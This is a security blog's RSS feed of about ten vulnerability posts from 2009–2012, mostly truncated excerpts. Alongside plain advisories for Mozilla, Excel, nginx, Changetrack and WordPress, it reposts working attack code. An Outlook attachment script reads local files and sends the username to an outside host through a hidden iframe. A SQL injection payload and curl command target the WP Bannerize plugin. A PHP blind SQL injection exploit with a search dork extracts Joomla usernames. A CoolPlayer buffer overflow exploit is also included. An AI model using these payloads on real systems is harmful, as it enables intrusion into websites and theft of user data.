<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; vulnerability</title>
	<atom:link href="http://www.goitworld.com/tag/vulnerability/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Outlook vulnerability explain</title>
		<link>http://www.goitworld.com/outlook-vulnerability-explain/</link>
		<comments>http://www.goitworld.com/outlook-vulnerability-explain/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 13:10:35 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[outlook]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/outlook-vulnerability-explain/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>Send attenment demo.htm </p>
<p>Code:</p>
<blockquote><li>
<pre>&#60;script&#62;</pre>
</li>
<li>
<pre>xmlhttp=new ActiveXObject(&#34;Msxml2.XMLHTTP.3.0&#34;);</pre>
</li>
<li>
<pre>xmlhttp.open(&#34;GET&#34;,&#34;../../../../../../../../../../../../../../boot.ini&#34;,false);</pre>
</li>
<li>
<pre>xmlhttp.send();</pre>
</li>
<li>
<pre>alert(xmlhttp.responseText);</pre>
</li>
<li>
<pre>&#60;/script&#62;</pre>
</li>
<p>&#160;</p>
</blockquote>
<p>Information:</p>
<blockquote>
<p>&#60;script&#62;alert(document.URL)&#60;/script&#62;</p>
</blockquote>
<p>Get dir info</p>
<blockquote>
<p>C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx</p>
</blockquote>
<p>Demo:</p>
<blockquote>
<li>
<pre>&#60;script&#62;</pre>
</li>
<li>
<pre>var path = document.URL;</pre>
</li>
<li>
<pre>var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];</pre>
</li>
<li>
<pre>iframe_dom(&#34;http://www.80vul.com/hackgame/xs-g0.php?username=&#34;+username);</pre>
</li>
<li>
<pre>&#160;</pre>
</li>
<li>
<pre>function iframe_dom(script_filename) {</pre>
</li>
<li>
<pre>    var d = window.document;</pre>
</li>
<li>
<pre>    var newIframe = d.createElement('iframe');</pre>
</li>
<li>
<pre>    newIframe.src=script_filename;</pre>
</li>
<li>
<pre>    newIframe.style.width = 0;</pre>
</li>
<li>
<pre>    newIframe.style.height = 0;</pre>
</li>
<li>
<pre>    d.appendChild(newIframe);</pre>
</li>
<li>
<pre>    return false;</pre>
</li>
<li>
<pre>} &#60;/script&#62;</pre>
</li>
</blockquote>
<p></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/outlook-vulnerability-explain/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress WP Bannerize plugin &lt;= 2.8.7 SQL Injection Vulnerability</title>
		<link>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</link>
		<comments>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/#comments</comments>
		<pubDate>Sun, 02 Oct 2011 11:11:40 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp bannerize plugin]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/</guid>
		<description><![CDATA[<blockquote><p># Exploit Title: WordPress WP Bannerize plugin &#60;= 2.8.7 SQL Injection Vulnerability     <br /># Date: 2011-09-22      <br /># Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)      <br /># Software Link: <a href="http://downloads.wordpress.org/plugin/wp-bannerize.zip">http://downloads.wordpress.org/plugin/wp-bannerize.zip</a>      <br /># Version: 2.8.7 (tested)      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />PoC (POST data)      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br /><a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br /> limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)      <br />&#160; <br />e.g.      <br />curl &#8211;data &#34;limit=1&#38;offset=1&#38;item[]=-1 AND 1=IF(2&#62;1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&#34; -H &#34;X-Requested-With:XMLHttpRequest&#34; <a href="http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php">http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php</a>      <br />&#160; <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />Vulnerable code      <br />&#8212;&#8212;&#8212;&#8212;&#8212;      <br />if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {      <br />&#160;&#160;&#160; &#8230;      <br />&#160;&#160;&#160; $limit = intval($_POST['limit']);      <br />&#160;&#160;&#160; $page_offset = (intval($_POST['offset']) &#8211; 1) * $limit;      <br />&#160; <br</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/wordpress-wp-bannerize-plugin-2-8-7-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Excel Record Integer Signedness Vulnerability</title>
		<link>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</link>
		<comments>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/#comments</comments>
		<pubDate>Fri, 16 Sep 2011 05:44:50 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[execl]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[record integer signedness]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</guid>
		<description><![CDATA[<h6>I. BACKGROUND</h6>
<p>Excel is the spreadsheet application included with Microsoft Corp.&#8217;s Office productivity software suite. More information is available at the following website: </p>
<p><a href="http://office.microsoft.com/excel/">http://office.microsoft.com/excel/</a></p>
<h6>II. DESCRIPTION</h6>
<p>Remote exploitation of an integer signedness vulnerability in Microsoft Corp.&#8217;s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. </p>
<p>The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative &#8216;iax&#8217; field. </p>
<p>It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign&#8230; <a href="http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CoolPlayer 219 Buffer Overflow Exploit</title>
		<link>http://www.goitworld.com/coolplayer-219-buffer-overflow-exploit/</link>
		<comments>http://www.goitworld.com/coolplayer-219-buffer-overflow-exploit/#comments</comments>
		<pubDate>Sat, 13 Aug 2011 02:25:13 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[CoolPlayer 219 Buffer Overflow Exploit]]></category>
		<category><![CDATA[Inj3ct0r - exploit database :]]></category>
		<category><![CDATA[shellcode]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/coolplayer-219-buffer-overflow-exploit/</guid>
		<description><![CDATA[<p>&#160;</p>
<blockquote><p># #########################################################################     <br />#~ Title&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : CoolPlayer 219 Buffer Overflow Exploit&#160;&#160; <br />#~ Software&#160;&#160;&#160;&#160;&#160; : <a href="http://coolplayer.en.softonic.com/">http://coolplayer.en.softonic.com/</a>      <br />#~ Tested on&#160;&#160;&#160;&#160; : Windows XP SP3 English      <br />#~ Date&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : 04/07/2011      <br />#~ Author&#160;&#160;&#160;&#160;&#160;&#160;&#160; : X-h4ck      <br />#~ Site&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : <a href="http://www.pirate.al/">http://www.pirate.al/</a> #PirateAL Crew , <a href="http://theflashcrew.blogspot.com/">http://theflashcrew.blogspot.com/</a>       <br />#~ Email&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; : mem001@live.com       <br />#~ Greetz&#160;&#160;&#160;&#160;&#160;&#160;&#160; : Wulns~ &#8211; IllyrianWarrior &#8211; Danzel &#8211; Ace &#8211; M4yh3m &#8211; Saldeath &#8211; bi0 &#8211; Slimshaddy &#8211; d3trimentaL &#8211; Lekosta &#8211; Pretorian &#8211; CroSs(r00tworm) &#8211; Rigon      <br /># #########################################################################</p>
<p>#!/usr/bin/python     <br />print &#34; CoolPlayer 219 Buffer Overflow Exploit&#34;      <br />print &#34; Author : X-h4ck&#34;</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/coolplayer-219-buffer-overflow-exploit/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/coolplayer-219-buffer-overflow-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mozilla Foundation Security Advisory 2011-20</title>
		<link>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/</link>
		<comments>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/#comments</comments>
		<pubDate>Thu, 23 Jun 2011 14:53:49 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[foundation]]></category>
		<category><![CDATA[Mozilla]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/</guid>
		<description><![CDATA[<p>Title: Use-after-free vulnerability when viewing XUL document with script disabled   <br />Impact: Critical    <br />Announced: June 21, 2011    <br />Reporter: Martin Barbella    <br />Products: Firefox, Thunderbird, SeaMonkey    <br />Fixed in: Firefox 5    <br />Firefox 3.6.18    <br />Thunderbird 3.1.11</p>
<h5>Description</h5>
<p>Security researcher <strong>Martin Barbella</strong> reported that under certain conditions, viewing a XUL document while JavaScript was disabled caused deleted memory to be accessed. This flaw could potentially be used by an attacker to crash a victim&#8217;s browser and run arbitrary code on their computer.</p>
<h5>References</h5>
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=617247">https://bugzilla.mozilla.org/show_bug.cgi?id=617247</a></li>
<li><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2373">CVE-2011-2373</a></li>
</ul>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>nginx php file parse vulnerability</title>
		<link>http://www.goitworld.com/nginx-php-file-parse-vulnerability/</link>
		<comments>http://www.goitworld.com/nginx-php-file-parse-vulnerability/#comments</comments>
		<pubDate>Thu, 27 May 2010 05:02:49 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[location]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/nginx-php-file-parse-vulnerability/</guid>
		<description><![CDATA[<p>nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by <a href="http://sysoev.ru/en/">Igor Sysoev</a>. It has been running for more than five years on many heavily loaded Russian sites including. The vulnerability will let error file type as php file. It’s a very critical bug.</p>
<p>Generally, nginx will parse php file by cgi. Example:</p>
<p>location ~ \.php$ {   <br />root html;    <br />fastcgi_pass 127.0.0.1:9000;    <br />fastcgi_index index.php;    <br />fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;    <br />include fastcgi_params;    <br />}</p>
<p>In location part,nginx will proceed request by URI variable, and the SCRIPT_FILENAME’s value will be defined&#8230; <a href="http://www.goitworld.com/nginx-php-file-parse-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/nginx-php-file-parse-vulnerability/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Joomla Component com_joomlaconnect_be Blind Injection Vulnerability</title>
		<link>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/</link>
		<comments>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 09:44:47 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/</guid>
		<description><![CDATA[<p>Test Code</p>
<pre>

#!/usr/bin/php
  &#60;?php 

ini_set(&#34;max_execution_time&#34;,0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:&#160;&#160; [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:&#160; [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc&#62; ] 

[»] Greetz to:[ Spécial &#62;&#62;&#62;&#62;His0k4 &#62;&#62;&#62;&#62;&#160;&#160; Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#&#160; Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#&#160; [x] Usage: joomla.php &#34;<a href="http://url/index.php?option=com_joomlaconnect_be&#38;Itemid=53&#38;task=showBizPage&#38;id=3">http://url/index.php?option=com_joomlaconnect_be&#38;Itemid=53&#38;task=showBizPage&#38;id=3</a> 

# 

# 

########################################################################### 

'); 

if ($argc &#62; 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url.&#34;+and+1=1--&#34;)); 

echo &#34;\nExploiting:\n&#34;; 

$w = strlen(file_get_contents($url.&#34;+and+1=0--&#34;)); 

$t = abs((100-($w/$r*100))); 

echo &#34;Username: &#34;; 

for ($i=1; $i &#60;= 30; $i++) { 

$laenge = strlen(file_get_contents($url.&#34;+and+ascii(substring((select+username+from+jos_users+limit+0,1),&#34;.$i.&#34;,1))!=0--&#34;)); 

&#160;&#160; if</pre><p>&#8230; <a href="http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/joomla-component-com_joomlaconnect_be-blind-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Changetrack 4.3-3 Local Privilege Escalation Vulnerability</title>
		<link>http://www.goitworld.com/changetrack-4-3-3-local-privilege-escalation-vulnerability/</link>
		<comments>http://www.goitworld.com/changetrack-4-3-3-local-privilege-escalation-vulnerability/#comments</comments>
		<pubDate>Sat, 03 Oct 2009 14:07:10 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[changetrack]]></category>
		<category><![CDATA[escalatio]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/changetrack-4-3-3-local-privilege-escalation-vulnerability/</guid>
		<description><![CDATA[<p>TITLE:   <br />Changetrack Privilege Escalation Vulnerability </p>
<p>SECUNIA ADVISORY ID:   <br />SA36756 </p>
<p>VERIFY ADVISORY:   <br /><a href="http://secunia.com/advisories/36756/">http://secunia.com/advisories/36756/</a></p>
<p>DESCRIPTION:   <br />A vulnerability has been discovered in Changetrack, which can be    <br />exploited by malicious, local users to gain escalated privileges. </p>
<p>The application does not properly escape certain file names, which   <br />can be exploited to inject and execute arbitrary shell commands    <br />(potentially with &#34;root&#34; privileges) by creating a maliciously named    <br />file in a directory tracked by Changetrack. </p>
<p>Successful exploitation requires write privileges to a directory   <br />scanned by Changetrack. </p>
<p>SOLUTION:   <br />Use Changetrack to track trusted&#8230; <a href="http://www.goitworld.com/changetrack-4-3-3-local-privilege-escalation-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/changetrack-4-3-3-local-privilege-escalation-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Please immediately upgrade your wordpress to 2.8.4</title>
		<link>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/</link>
		<comments>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 03:20:05 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[IT News World]]></category>
		<category><![CDATA[upgrade]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/</guid>
		<description><![CDATA[<p>A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.</p>
<p>We fixed this problem last night and have been testing the fixes and looking for other problems since then. <a href="http://wordpress.org/download/">Version 2.8.4 which fixes all known problems is now</a>&#8230; <a href="http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/please-immediately-upgrade-your-wordpress-to-2-8-4/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>NcFTPd &lt;= 2.8.5 Remote Jail Breakout Vulnerability</title>
		<link>http://www.goitworld.com/ncftpd-2-8-5-remote-jail-breakout-vulnerability/</link>
		<comments>http://www.goitworld.com/ncftpd-2-8-5-remote-jail-breakout-vulnerability/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 06:20:45 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[nfcftpd]]></category>
		<category><![CDATA[remote jail breakout]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/ncftpd-2-8-5-remote-jail-breakout-vulnerability/</guid>
		<description><![CDATA[<p>Discovered by:   <br />&#160;&#160;&#160; Kingcope    <br />&#160;&#160;&#160; Contact: kcope2&#60;at&#62;googlemail.com / <a href="http://isowarez.de">http://isowarez.de</a></p>
<p>Date:   <br />&#160;&#160;&#160; 27th July 2009 </p>
<p>Greetings:   <br />&#160;&#160;&#160; Alex,Andi,Adize,wY!,Netspy,Revoguard </p>
<p>Prerequisites:   <br />&#160;&#160;&#160; Valid user account.    <br />Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version): </p>
<p># ftp 192.168.2.5   <br />Connected to 192.168.2.5.    <br />220 localhost NcFTPd Server (unregistered copy) ready.    <br />Name (192.168.2.5:root): kcope    <br />331 User kcope okay, need password.    <br />Password:    <br />230-You are user #1 of 50 simultaneous users allowed.    <br />230-    <br />230 Restricted user logged in.    <br />Remote system type is UNIX.    <br />Using binary mode to transfer files.&#8230; <a href="http://www.goitworld.com/ncftpd-2-8-5-remote-jail-breakout-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/ncftpd-2-8-5-remote-jail-breakout-vulnerability/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

